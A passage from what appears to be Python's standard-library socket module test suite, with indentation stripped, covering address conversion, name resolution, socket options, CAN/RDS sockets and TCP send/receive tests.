self.assertIn('an integer is required', str(cm.exception))
# wrong number of args
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo')
self.assertIn('(1 given)', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 0, sockname, 4)
self.assertIn('(4 given)', str(cm.exception))
def testCrucialConstants(self):
# Testing for mission critical constants
socket.AF_INET
socket.SOCK_STREAM
socket.SOCK_DGRAM
socket.SOCK_RAW
socket.SOCK_RDM
socket.SOCK_SEQPACKET
socket.SOL_SOCKET
socket.SO_REUSEADDR
def testHostnameRes(self):
# Testing hostname resolution mechanisms
hostname = socket.gethostname()
try:
ip = socket.gethostbyname(hostname)
except socket.error:
# Probably name lookup wasn't set up right; skip this test
return
self.assertTrue(ip.find('.') >= 0, "Error resolving host to ip.")
try:
hname, aliases, ipaddrs = socket.gethostbyaddr(ip)
except socket.error:
# Probably a similar problem as above; skip this test
return
all_host_names = [hostname, hname] + aliases
fqhn = socket.getfqdn(ip)
if not fqhn in all_host_names:
self.fail("Error testing host resolution mechanisms. (fqdn: %s, all: %s)" % (fqhn, repr(all_host_names)))
@unittest.skipUnless(hasattr(socket, 'sethostname'), "test needs socket.sethostname()")
@unittest.skipUnless(hasattr(socket, 'gethostname'), "test needs socket.gethostname()")
def test_sethostname(self):
oldhn = socket.gethostname()
try:
socket.sethostname('new')
except socket.error as e:
if e.errno == errno.EPERM:
self.skipTest("test should be run as root")
else:
raise
try:
# running test as root!
self.assertEqual(socket.gethostname(), 'new')
# Should work with bytes objects too
socket.sethostname(b'bar')
self.assertEqual(socket.gethostname(), 'bar')
finally:
socket.sethostname(oldhn)
@unittest.skipUnless(hasattr(socket, 'if_nameindex'),
'socket.if_nameindex() not available.')
def testInterfaceNameIndex(self):
interfaces = socket.if_nameindex()
for index, name in interfaces:
self.assertIsInstance(index, int)
self.assertIsInstance(name, str)
# interface indices are non-zero integers
self.assertGreater(index, 0)
_index = socket.if_nametoindex(name)
self.assertIsInstance(_index, int)
self.assertEqual(index, _index)
_name = socket.if_indextoname(index)
self.assertIsInstance(_name, str)
self.assertEqual(name, _name)
@unittest.skipUnless(hasattr(socket, 'if_nameindex'),
'socket.if_nameindex() not available.')
def testInvalidInterfaceNameIndex(self):
# test nonexistent interface index/name
self.assertRaises(socket.error, socket.if_indextoname, 0)
self.assertRaises(socket.error, socket.if_nametoindex, '_DEADBEEF')
# test with invalid values
self.assertRaises(TypeError, socket.if_nametoindex, 0)
self.assertRaises(TypeError, socket.if_indextoname, '_DEADBEEF')
def testRefCountGetNameInfo(self):
# Testing reference count for getnameinfo
if hasattr(sys, "getrefcount"):
try:
# On some versions, this loses a reference
orig = sys.getrefcount(__name__)
socket.getnameinfo(__name__,0)
except TypeError:
if sys.getrefcount(__name__) != orig:
self.fail("socket.getnameinfo loses a reference")
def testInterpreterCrash(self):
# Making sure getnameinfo doesn't crash the interpreter
try:
# On some versions, this crashes the interpreter.
socket.getnameinfo(('x', 0, 0, 0), 0)
except socket.error:
pass
def testNtoH(self):
# This just checks that htons etc. are their own inverse,
# when looking at the lower 16 or 32 bits.
sizes = {socket.htonl: 32, socket.ntohl: 32,
socket.htons: 16, socket.ntohs: 16}
for func, size in sizes.items():
mask = (1<<size) - 1
for i in (0, 1, 0xffff, ~0xffff, 2, 0x01234567, 0x76543210):
self.assertEqual(i & mask, func(func(i&mask)) & mask)
swapped = func(mask)
self.assertEqual(swapped & mask, mask)
self.assertRaises(OverflowError, func, 1<<34)
def testNtoHErrors(self):
good_values = [ 1, 2, 3, 1, 2, 3 ]
bad_values = [ -1, -2, -3, -1, -2, -3 ]
for k in good_values:
socket.ntohl(k)
socket.ntohs(k)
socket.htonl(k)
socket.htons(k)
for k in bad_values:
self.assertRaises(OverflowError, socket.ntohl, k)
self.assertRaises(OverflowError, socket.ntohs, k)
self.assertRaises(OverflowError, socket.htonl, k)
self.assertRaises(OverflowError, socket.htons, k)
def testGetServBy(self):
eq = self.assertEqual
# Find one service that exists, then check all the related interfaces.
# I've ordered this by protocols that have both a tcp and udp
# protocol, at least for modern Linuxes.
if (sys.platform.startswith(('freebsd', 'netbsd'))
or sys.platform in ('linux', 'darwin')):
# avoid the 'echo' service on this platform, as there is an
# assumption breaking non-standard port/protocol entry
services = ('daytime', 'qotd', 'domain')
else:
services = ('echo', 'daytime', 'domain')
for service in services:
try:
port = socket.getservbyname(service, 'tcp')
break
except socket.error:
pass
else:
raise socket.error
# Try same call with optional protocol omitted
port2 = socket.getservbyname(service)
eq(port, port2)
# Try udp, but don't barf if it doesn't exist
try:
udpport = socket.getservbyname(service, 'udp')
except socket.error:
udpport = None
else:
eq(udpport, port)
# Now make sure the lookup by port returns the same service name
eq(socket.getservbyport(port2), service)
eq(socket.getservbyport(port, 'tcp'), service)
if udpport is not None:
eq(socket.getservbyport(udpport, 'udp'), service)
# Make sure getservbyport does not accept out of range ports.
self.assertRaises(OverflowError, socket.getservbyport, -1)
self.assertRaises(OverflowError, socket.getservbyport, 65536)
def testDefaultTimeout(self):
# Testing default timeout
# The default timeout should initially be None
self.assertEqual(socket.getdefaulttimeout(), None)
s = socket.socket()
self.assertEqual(s.gettimeout(), None)
s.close()
# Set the default timeout to 10, and see if it propagates
socket.setdefaulttimeout(10)
self.assertEqual(socket.getdefaulttimeout(), 10)
s = socket.socket()
self.assertEqual(s.gettimeout(), 10)
s.close()
# Reset the default timeout to None, and see if it propagates
socket.setdefaulttimeout(None)
self.assertEqual(socket.getdefaulttimeout(), None)
s = socket.socket()
self.assertEqual(s.gettimeout(), None)
s.close()
# Check that setting it to an invalid value raises ValueError
self.assertRaises(ValueError, socket.setdefaulttimeout, -1)
# Check that setting it to an invalid type raises TypeError
self.assertRaises(TypeError, socket.setdefaulttimeout, "spam")
def testIPv4_inet_aton_fourbytes(self):
if not hasattr(socket, 'inet_aton'):
return # No inet_aton, nothing to check
# Test that issue1008086 and issue767150 are fixed.
# It must return 4 bytes.
self.assertEqual(b'\x00'*4, socket.inet_aton('0.0.0.0'))
self.assertEqual(b'\xff'*4, socket.inet_aton('255.255.255.255'))
def testIPv4toString(self):
if not hasattr(socket, 'inet_pton'):
return # No inet_pton() on this platform
from socket import inet_aton as f, inet_pton, AF_INET
g = lambda a: inet_pton(AF_INET, a)
assertInvalid = lambda func,a: self.assertRaises(
(socket.error, ValueError), func, a
)
self.assertEqual(b'\x00\x00\x00\x00', f('0.0.0.0'))
self.assertEqual(b'\xff\x00\xff\x00', f('255.0.255.0'))
self.assertEqual(b'\xaa\xaa\xaa\xaa', f('170.170.170.170'))
self.assertEqual(b'\x01\x02\x03\x04', f('1.2.3.4'))
self.assertEqual(b'\xff\xff\xff\xff', f('255.255.255.255'))
assertInvalid(f, '0.0.0.')
assertInvalid(f, '300.0.0.0')
assertInvalid(f, 'a.0.0.0')
assertInvalid(f, '1.2.3.4.5')
assertInvalid(f, '::1')
self.assertEqual(b'\x00\x00\x00\x00', g('0.0.0.0'))
self.assertEqual(b'\xff\x00\xff\x00', g('255.0.255.0'))
self.assertEqual(b'\xaa\xaa\xaa\xaa', g('170.170.170.170'))
self.assertEqual(b'\xff\xff\xff\xff', g('255.255.255.255'))
assertInvalid(g, '0.0.0.')
assertInvalid(g, '300.0.0.0')
assertInvalid(g, 'a.0.0.0')
assertInvalid(g, '1.2.3.4.5')
assertInvalid(g, '::1')
def testIPv6toString(self):
if not hasattr(socket, 'inet_pton'):
return # No inet_pton() on this platform
try:
from socket import inet_pton, AF_INET6, has_ipv6
if not has_ipv6:
return
except ImportError:
return
f = lambda a: inet_pton(AF_INET6, a)
assertInvalid = lambda a: self.assertRaises(
(socket.error, ValueError), f, a
)
self.assertEqual(b'\x00' * 16, f('::'))
self.assertEqual(b'\x00' * 16, f('0::0'))
self.assertEqual(b'\x00\x01' + b'\x00' * 14, f('1::'))
self.assertEqual(
b'\x45\xef\x76\xcb\x00\x1a\x56\xef\xaf\xeb\x0b\xac\x19\x24\xae\xae',
f('45ef:76cb:1a:56ef:afeb:bac:1924:aeae')
)
self.assertEqual(
b'\xad\x42\x0a\xbc' + b'\x00' * 4 + b'\x01\x27\x00\x00\x02\x54\x00\x02',
f('ad42:abc::127:0:254:2')
)
self.assertEqual(b'\x00\x12\x00\x0a' + b'\x00' * 12, f('12:a::'))
assertInvalid('0x20::')
assertInvalid(':::')
assertInvalid('::0::')
assertInvalid('1::abc::')
assertInvalid('1::abc::def')
assertInvalid('1:2:3:4:5:6:')
assertInvalid('1:2:3:4:5:6')
assertInvalid('1:2:3:4:5:6:7:8:')
assertInvalid('1:2:3:4:5:6:7:8:0')
self.assertEqual(b'\x00' * 12 + b'\xfe\x2a\x17\x40',
f('::254.42.23.64')
)
self.assertEqual(
b'\x00\x42' + b'\x00' * 8 + b'\xa2\x9b\xfe\x2a\x17\x40',
f('42::a29b:254.42.23.64')
)
self.assertEqual(
b'\x00\x42\xa8\xb9\x00\x00\x00\x02\xff\xff\xa2\x9b\xfe\x2a\x17\x40',
f('42:a8b9:0:2:ffff:a29b:254.42.23.64')
)
assertInvalid('255.254.253.252')
assertInvalid('1::260.2.3.0')
assertInvalid('1::0.be.e.0')
assertInvalid('1:2:3:4:5:6:7:1.2.3.4')
assertInvalid('::1.2.3.4:0')
assertInvalid('0.100.200.0:3:4:5:6:7:8')
def testStringToIPv4(self):
if not hasattr(socket, 'inet_ntop'):
return # No inet_ntop() on this platform
from socket import inet_ntoa as f, inet_ntop, AF_INET
g = lambda a: inet_ntop(AF_INET, a)
assertInvalid = lambda func,a: self.assertRaises(
(socket.error, ValueError), func, a
)
self.assertEqual('1.0.1.0', f(b'\x01\x00\x01\x00'))
self.assertEqual('170.85.170.85', f(b'\xaa\x55\xaa\x55'))
self.assertEqual('255.255.255.255', f(b'\xff\xff\xff\xff'))
self.assertEqual('1.2.3.4', f(b'\x01\x02\x03\x04'))
assertInvalid(f, b'\x00' * 3)
assertInvalid(f, b'\x00' * 5)
assertInvalid(f, b'\x00' * 16)
self.assertEqual('1.0.1.0', g(b'\x01\x00\x01\x00'))
self.assertEqual('170.85.170.85', g(b'\xaa\x55\xaa\x55'))
self.assertEqual('255.255.255.255', g(b'\xff\xff\xff\xff'))
assertInvalid(g, b'\x00' * 3)
assertInvalid(g, b'\x00' * 5)
assertInvalid(g, b'\x00' * 16)
def testStringToIPv6(self):
if not hasattr(socket, 'inet_ntop'):
return # No inet_ntop() on this platform
try:
from socket import inet_ntop, AF_INET6, has_ipv6
if not has_ipv6:
return
except ImportError:
return
f = lambda a: inet_ntop(AF_INET6, a)
assertInvalid = lambda a: self.assertRaises(
(socket.error, ValueError), f, a
)
self.assertEqual('::', f(b'\x00' * 16))
self.assertEqual('::1', f(b'\x00' * 15 + b'\x01'))
self.assertEqual(
'aef:b01:506:1001:ffff:9997:55:170',
f(b'\x0a\xef\x0b\x01\x05\x06\x10\x01\xff\xff\x99\x97\x00\x55\x01\x70')
)
assertInvalid(b'\x12' * 15)
assertInvalid(b'\x12' * 17)
assertInvalid(b'\x12' * 4)
# XXX The following don't test module-level functionality...
def testSockName(self):
# Testing getsockname()
port = support.find_unused_port()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
sock.bind(("0.0.0.0", port))
name = sock.getsockname()
# XXX(nnorwitz): http://tinyurl.com/os5jz seems to indicate
# it reasonable to get the host's addr in addition to 0.0.0.0.
# At least for eCos. This is required for the S/390 to pass.
try:
my_ip_addr = socket.gethostbyname(socket.gethostname())
except socket.error:
# Probably name lookup wasn't set up right; skip this test
return
self.assertIn(name[0], ("0.0.0.0", my_ip_addr), '%s invalid' % name[0])
self.assertEqual(name[1], port)
def testGetSockOpt(self):
# Testing getsockopt()
# We know a socket should start without reuse==0
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
reuse = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
self.assertFalse(reuse != 0, "initial mode is reuse")
def testSetSockOpt(self):
# Testing setsockopt()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
reuse = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
self.assertFalse(reuse == 0, "failed to set reuse mode")
def testSendAfterClose(self):
# testing send() after close() with timeout
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(1)
sock.close()
self.assertRaises(socket.error, sock.send, b"spam")
def testNewAttributes(self):
# testing .family, .type and .protocol
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.assertEqual(sock.family, socket.AF_INET)
self.assertEqual(sock.type, socket.SOCK_STREAM)
self.assertEqual(sock.proto, 0)
sock.close()
def test_getsockaddrarg(self):
host = '0.0.0.0'
port = support.find_unused_port()
big_port = port + 65536
neg_port = port - 65536
sock = socket.socket()
try:
self.assertRaises(OverflowError, sock.bind, (host, big_port))
self.assertRaises(OverflowError, sock.bind, (host, neg_port))
sock.bind((host, port))
finally:
sock.close()
@unittest.skipUnless(os.name == "nt", "Windows specific")
def test_sock_ioctl(self):
self.assertTrue(hasattr(socket.socket, 'ioctl'))
self.assertTrue(hasattr(socket, 'SIO_RCVALL'))
self.assertTrue(hasattr(socket, 'RCVALL_ON'))
self.assertTrue(hasattr(socket, 'RCVALL_OFF'))
self.assertTrue(hasattr(socket, 'SIO_KEEPALIVE_VALS'))
s = socket.socket()
self.addCleanup(s.close)
self.assertRaises(ValueError, s.ioctl, -1, None)
s.ioctl(socket.SIO_KEEPALIVE_VALS, (1, 100, 100))
def testGetaddrinfo(self):
try:
socket.getaddrinfo('localhost', 80)
except socket.gaierror as err:
if err.errno == socket.EAI_SERVICE:
# see http://bugs.python.org/issue1282647
self.skipTest("buggy libc version")
raise
# len of every sequence is supposed to be == 5
for info in socket.getaddrinfo(HOST, None):
self.assertEqual(len(info), 5)
# host can be a domain name, a string representation of an
# IPv4/v6 address or None
socket.getaddrinfo('localhost', 80)
socket.getaddrinfo('127.0.0.1', 80)
socket.getaddrinfo(None, 80)
if support.IPV6_ENABLED:
socket.getaddrinfo('::1', 80)
# port can be a string service name such as "http", a numeric
# port number or None
socket.getaddrinfo(HOST, "http")
socket.getaddrinfo(HOST, 80)
socket.getaddrinfo(HOST, None)
# test family and socktype filters
infos = socket.getaddrinfo(HOST, None, socket.AF_INET)
for family, _, _, _, _ in infos:
self.assertEqual(family, socket.AF_INET)
infos = socket.getaddrinfo(HOST, None, 0, socket.SOCK_STREAM)
for _, socktype, _, _, _ in infos:
self.assertEqual(socktype, socket.SOCK_STREAM)
# test proto and flags arguments
socket.getaddrinfo(HOST, None, 0, 0, socket.SOL_TCP)
socket.getaddrinfo(HOST, None, 0, 0, 0, socket.AI_PASSIVE)
# a server willing to support both IPv4 and IPv6 will
# usually do this
socket.getaddrinfo(None, 0, socket.AF_UNSPEC, socket.SOCK_STREAM, 0,
socket.AI_PASSIVE)
# test keyword arguments
a = socket.getaddrinfo(HOST, None)
b = socket.getaddrinfo(host=HOST, port=None)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, socket.AF_INET)
b = socket.getaddrinfo(HOST, None, family=socket.AF_INET)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, socket.SOCK_STREAM)
b = socket.getaddrinfo(HOST, None, type=socket.SOCK_STREAM)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, 0, socket.SOL_TCP)
b = socket.getaddrinfo(HOST, None, proto=socket.SOL_TCP)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, 0, 0, socket.AI_PASSIVE)
b = socket.getaddrinfo(HOST, None, flags=socket.AI_PASSIVE)
self.assertEqual(a, b)
a = socket.getaddrinfo(None, 0, socket.AF_UNSPEC, socket.SOCK_STREAM, 0,
socket.AI_PASSIVE)
b = socket.getaddrinfo(host=None, port=0, family=socket.AF_UNSPEC,
type=socket.SOCK_STREAM, proto=0,
flags=socket.AI_PASSIVE)
self.assertEqual(a, b)
# Issue #6697.
self.assertRaises(UnicodeEncodeError, socket.getaddrinfo, 'localhost', '\uD800')
# Issue 17269
if hasattr(socket, 'AI_NUMERICSERV'):
socket.getaddrinfo("localhost", None, 0, 0, 0, socket.AI_NUMERICSERV)
def test_getnameinfo(self):
# only IP addresses are allowed
self.assertRaises(socket.error, socket.getnameinfo, ('mail.python.org',0), 0)
@unittest.skipUnless(support.is_resource_enabled('network'),
'network is not enabled')
def test_idna(self):
# Check for internet access before running test (issue #12804).
try:
socket.gethostbyname('python.org')
except socket.gaierror as e:
if e.errno == socket.EAI_NODATA:
self.skipTest('internet access required for this test')
# these should all be successful
socket.gethostbyname('испытание.python.org')
socket.gethostbyname_ex('испытание.python.org')
socket.getaddrinfo('испытание.python.org',0,socket.AF_UNSPEC,socket.SOCK_STREAM)
# this may not work if the forward lookup choses the IPv6 address, as that doesn't
# have a reverse entry yet
# socket.gethostbyaddr('испытание.python.org')
def check_sendall_interrupted(self, with_timeout):
# socketpair() is not stricly required, but it makes things easier.
if not hasattr(signal, 'alarm') or not hasattr(socket, 'socketpair'):
self.skipTest("signal.alarm and socket.socketpair required for this test")
# Our signal handlers clobber the C errno by calling a math function
# with an invalid domain value.
def ok_handler(*args):
self.assertRaises(ValueError, math.acosh, 0)
def raising_handler(*args):
self.assertRaises(ValueError, math.acosh, 0)
1 // 0
c, s = socket.socketpair()
old_alarm = signal.signal(signal.SIGALRM, raising_handler)
try:
if with_timeout:
# Just above the one second minimum for signal.alarm
c.settimeout(1.5)
with self.assertRaises(ZeroDivisionError):
signal.alarm(1)
c.sendall(b"x" * support.SOCK_MAX_SIZE)
if with_timeout:
signal.signal(signal.SIGALRM, ok_handler)
signal.alarm(1)
self.assertRaises(socket.timeout, c.sendall,
b"x" * support.SOCK_MAX_SIZE)
finally:
signal.alarm(0)
signal.signal(signal.SIGALRM, old_alarm)
c.close()
s.close()
def test_sendall_interrupted(self):
self.check_sendall_interrupted(False)
def test_sendall_interrupted_with_timeout(self):
self.check_sendall_interrupted(True)
def test_dealloc_warn(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
r = repr(sock)
with self.assertWarns(ResourceWarning) as cm:
sock = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
# An open socket file object gets dereferenced after the socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
f = sock.makefile('rb')
r = repr(sock)
sock = None
support.gc_collect()
with self.assertWarns(ResourceWarning):
f = None
support.gc_collect()
def test_name_closed_socketio(self):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
fp = sock.makefile("rb")
fp.close()
self.assertEqual(repr(fp), "<_io.BufferedReader name=-1>")
def test_unusable_closed_socketio(self):
with socket.socket() as sock:
fp = sock.makefile("rb", buffering=0)
self.assertTrue(fp.readable())
self.assertFalse(fp.writable())
self.assertFalse(fp.seekable())
fp.close()
self.assertRaises(ValueError, fp.readable)
self.assertRaises(ValueError, fp.writable)
self.assertRaises(ValueError, fp.seekable)
def test_pickle(self):
sock = socket.socket()
with sock:
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
self.assertRaises(TypeError, pickle.dumps, sock, protocol)
def test_listen_backlog(self):
for backlog in 0, -1:
srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
srv.bind((HOST, 0))
srv.listen(backlog)
srv.close()
# Issue 15989
srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
srv.bind((HOST, 0))
self.assertRaises(OverflowError, srv.listen, _testcapi.INT_MAX + 1)
srv.close()
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
def test_flowinfo(self):
self.assertRaises(OverflowError, socket.getnameinfo,
('::1',0, 0xffffffff), 0)
with socket.socket(socket.AF_INET6, socket.SOCK_STREAM) as s:
self.assertRaises(OverflowError, s.bind, ('::1', 0, -10))
@unittest.skipUnless(HAVE_SOCKET_CAN, 'SocketCan required for this test.')
class BasicCANTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_CAN
socket.PF_CAN
socket.CAN_RAW
def testCreateSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
pass
def testBindAny(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
s.bind(('', ))
def testTooLongInterfaceName(self):
# most systems limit IFNAMSIZ to 16, take 1024 to be sure
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
self.assertRaisesRegex(socket.error, 'interface name too long',
s.bind, ('x' * 1024,))
@unittest.skipUnless(hasattr(socket, "CAN_RAW_LOOPBACK"),
'socket.CAN_RAW_LOOPBACK required for this test.')
def testLoopback(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
for loopback in (0, 1):
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_LOOPBACK,
loopback)
self.assertEqual(loopback,
s.getsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_LOOPBACK))
@unittest.skipUnless(hasattr(socket, "CAN_RAW_FILTER"),
'socket.CAN_RAW_FILTER required for this test.')
def testFilter(self):
can_id, can_mask = 0x200, 0x700
can_filter = struct.pack("=II", can_id, can_mask)
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, can_filter)
self.assertEqual(can_filter,
s.getsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, 8))
@unittest.skipUnless(HAVE_SOCKET_CAN, 'SocketCan required for this test.')
@unittest.skipUnless(thread, 'Threading required for this test.')
class CANTest(ThreadedCANSocketTest):
"""The CAN frame structure is defined in <linux/can.h>:
struct can_frame {
canid_t can_id; /* 32 bit CAN_ID + EFF/RTR/ERR flags */
__u8 can_dlc; /* data length code: 0 .. 8 */
__u8 data[8] __attribute__((aligned(8)));
};
"""
can_frame_fmt = "=IB3x8s"
def __init__(self, methodName='runTest'):
ThreadedCANSocketTest.__init__(self, methodName=methodName)
@classmethod
def build_can_frame(cls, can_id, data):
"""Build a CAN frame."""
can_dlc = len(data)
data = data.ljust(8, b'\x00')
return struct.pack(cls.can_frame_fmt, can_id, can_dlc, data)
@classmethod
def dissect_can_frame(cls, frame):
"""Dissect a CAN frame."""
can_id, can_dlc, data = struct.unpack(cls.can_frame_fmt, frame)
return (can_id, can_dlc, data[:can_dlc])
def testSendFrame(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
self.assertEqual(addr[0], self.interface)
self.assertEqual(addr[1], socket.AF_CAN)
def _testSendFrame(self):
self.cf = self.build_can_frame(0x00, b'\x01\x02\x03\x04\x05')
self.cli.send(self.cf)
def testSendMaxFrame(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
def _testSendMaxFrame(self):
self.cf = self.build_can_frame(0x00, b'\x07' * 8)
self.cli.send(self.cf)
def testSendMultiFrames(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf1, cf)
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf2, cf)
def _testSendMultiFrames(self):
self.cf1 = self.build_can_frame(0x07, b'\x44\x33\x22\x11')
self.cli.send(self.cf1)
self.cf2 = self.build_can_frame(0x12, b'\x99\x22\x33')
self.cli.send(self.cf2)
@unittest.skipUnless(HAVE_SOCKET_RDS, 'RDS sockets required for this test.')
class BasicRDSTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_RDS
socket.PF_RDS
def testCreateSocket(self):
with socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0) as s:
pass
def testSocketBufferSize(self):
bufsize = 16384
with socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0) as s:
s.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, bufsize)
s.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, bufsize)
@unittest.skipUnless(HAVE_SOCKET_RDS, 'RDS sockets required for this test.')
@unittest.skipUnless(thread, 'Threading required for this test.')
class RDSTest(ThreadedRDSSocketTest):
def __init__(self, methodName='runTest'):
ThreadedRDSSocketTest.__init__(self, methodName=methodName)
def setUp(self):
super().setUp()
self.evt = threading.Event()
def testSendAndRecv(self):
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
self.assertEqual(self.cli_addr, addr)
def _testSendAndRecv(self):
self.data = b'spam'
self.cli.sendto(self.data, 0, (HOST, self.port))
def testPeek(self):
data, addr = self.serv.recvfrom(self.bufsize, socket.MSG_PEEK)
self.assertEqual(self.data, data)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
def _testPeek(self):
self.data = b'spam'
self.cli.sendto(self.data, 0, (HOST, self.port))
@requireAttrs(socket.socket, 'recvmsg')
def testSendAndRecvMsg(self):
data, ancdata, msg_flags, addr = self.serv.recvmsg(self.bufsize)
self.assertEqual(self.data, data)
@requireAttrs(socket.socket, 'sendmsg')
def _testSendAndRecvMsg(self):
self.data = b'hello ' * 10
self.cli.sendmsg([self.data], (), 0, (HOST, self.port))
def testSendAndRecvMulti(self):
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data1, data)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data2, data)
def _testSendAndRecvMulti(self):
self.data1 = b'bacon'
self.cli.sendto(self.data1, 0, (HOST, self.port))
self.data2 = b'egg'
self.cli.sendto(self.data2, 0, (HOST, self.port))
def testSelect(self):
r, w, x = select.select([self.serv], [], [], 3.0)
self.assertIn(self.serv, r)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
def _testSelect(self):
self.data = b'select'
self.cli.sendto(self.data, 0, (HOST, self.port))
def testCongestion(self):
# wait until the sender is done
self.evt.wait()
def _testCongestion(self):
# test the behavior in case of congestion
self.data = b'fill'
self.cli.setblocking(False)
try:
# try to lower the receiver's socket buffer size
self.cli.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 16384)
except OSError:
pass
with self.assertRaises(OSError) as cm:
try:
# fill the receiver's socket buffer
while True:
self.cli.sendto(self.data, 0, (HOST, self.port))
finally:
# signal the receiver we're done
self.evt.set()
# sendto() should have failed with ENOBUFS
self.assertEqual(cm.exception.errno, errno.ENOBUFS)
# and we should have received a congestion notification through poll
r, w, x = select.select([self.serv], [], [], 3.0)
self.assertIn(self.serv, r)
@unittest.skipUnless(thread, 'Threading required for this test.')
class BasicTCPTest(SocketConnectedTest):
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def testRecv(self):
# Testing large receive over TCP
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, MSG)
def _testRecv(self):
self.serv_conn.send(MSG)
def testOverFlowRecv(self):
# Testing receive in chunks over TCP
seg1 = self.cli_conn.recv(len(MSG) - 3)
seg2 = self.cli_conn.recv(1024)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testOverFlowRecv(self):
self.serv_conn.send(MSG)
def testRecvFrom(self):
# Testing large recvfrom() over TCP
msg, addr = self.cli_conn.recvfrom(1024)
self.assertEqual(msg, MSG)
def _testRecvFrom(self):
self.serv_conn.send(MSG)
def testOverFlowRecvFrom(self):
# Testing recvfrom() in chunks over TCP
seg1, addr = self.cli_conn.recvfrom(len(MSG)-3)
seg2, addr = self.cli_conn.recvfrom(1024)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testOverFlowRecvFrom(self):
self.serv_conn.send(MSG)
def testSendAll(self):
# Testing sendall() with a 2048 byte string over TCP
msg = b''
while 1:
read = self.cli_conn.recv(1024)
if not read:
break
msg += read
self.assertEqual(msg, b'f' * 2048)
def _testSendAll(self):
big_chunk = b'f' * 2048
self.serv_conn.sendall(big_chunk)
def testFromFd(self):
# Testing fromfd()
fd = self.cli_conn.fileno()
sock = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
self.assertIsInstance(sock, socket.socket)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testFromFd(self):
self.serv_conn.send(MSG)
def testDup(self):
# Testing dup()
sock = self.cli_conn.dup()
self.addCleanup(sock.close)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testDup(self):
self.serv_conn.send(MSG)
def testShutdown(self):
# Testing shutdown()
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, MSG)
# wait for _testShutdown to finish: on OS X, when the server
# closes the connection the client also becomes disconnected,
# and the client's shutdown call will fail. (Issue #4397.)
self.done.wait()
def _testShutdown(self):
self.serv_conn.send(MSG)
# Issue 15989
self.assertRaises(OverflowError, self.serv_conn.shutdown,
_testcapi.INT_MAX + 1)
self.assertRaises(OverflowError, self.serv_conn.shutdown,
2 + (_testcapi.UINT_MAX + 1))
self.serv_conn.shutdown(2)
def testDetach(self):
# Testing detach()
fileno = self.cli_conn.fileno()
f = self.cli_conn.detach()
self.assertEqual(f, fileno)
# cli_conn cannot be used anymore...
self.assertTrue(self.cli_conn._closed)
self.assertRaises(socket.error, self.cli_conn.recv, 1024)
self.cli_conn.close()
# ...but we can create another socket using the (still open)
# file descriptor
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=f)
self.addCleanup(sock.close)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testDetach(self):
self.serv_conn.send(MSG)
@unittest.skipUnless(thread, 'Threading required for this test.')
class BasicUDPTest(ThreadedUDPSocketTest):
def __init__(self, methodName='runTest'):
ThreadedUDPSocketTest.__init__(self, methodName=methodName)
